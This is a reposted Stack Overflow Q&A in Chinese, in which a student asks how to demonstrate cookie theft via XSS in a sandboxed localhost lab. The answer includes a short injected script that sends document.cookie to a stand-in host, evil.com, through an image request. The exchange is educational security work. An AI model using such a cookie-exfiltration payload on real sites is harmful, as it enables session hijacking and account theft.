gpt4 book ai didi

javascript - 如何使用 localhost 演示 SOP 的利用

转载 作者:行者123 更新时间:2023-11-28 10:06:26 24 4
gpt4 key购买 nike

我正在做 XSHM(跨站点历史记录操作)项目。

我试图展示使用 XSS(跨站脚本)如何违反 SOP。我已经在沙箱 XP 机器内设置了一个本地主机(WAMP)服务器(必须符合道德规范),并使用一个简单的登录脚本,该脚本容易受到 XSS 攻击。

问题)我想表明,在将邪恶的 JavaScript 代码注入(inject)登录页面后,我可以将用户 cookie 发送到另一个源,但如何使用本地主机服务器来做到这一点?

如果 localhost 是一个源(即受害者站点),我如何创建与 localhost 不同的另一个源(即坏人站点)来发送 cookie?我知道同源要求(协议(protocol)、端口和域)相同。我无法更改为 HTTPS localhost 和 HTTP localhost,因为我没有证书。我似乎无法根据需要更改端口号:80 用于网络。

我不想使用真实的网站并将 cookie 发送到本地主机脚本,因为这是不道德的,而且也无法执行攻击,因为它没有 XSS 漏洞来证明可利用。

有什么想法吗?

最佳答案

来源并不重要,脚本只是读取同一来源的文档 cookie,然后将其作为字符串发送到服务器,在服务器上对其进行解码,然后在作恶者的浏览器或类似浏览器中手动设置 cookie。

<script>
var img = new Image();
img.src = "http://www.evil.com/c="+escape(document.cookie);
</script>

这会发送一个 GET 请求,并在 c 参数中包含用户的 cookie 详细信息,简单地请求图像并不违反 SOP,所以我不知道这是否有帮助。

关于javascript - 如何使用 localhost 演示 SOP 的利用,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/8285628/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com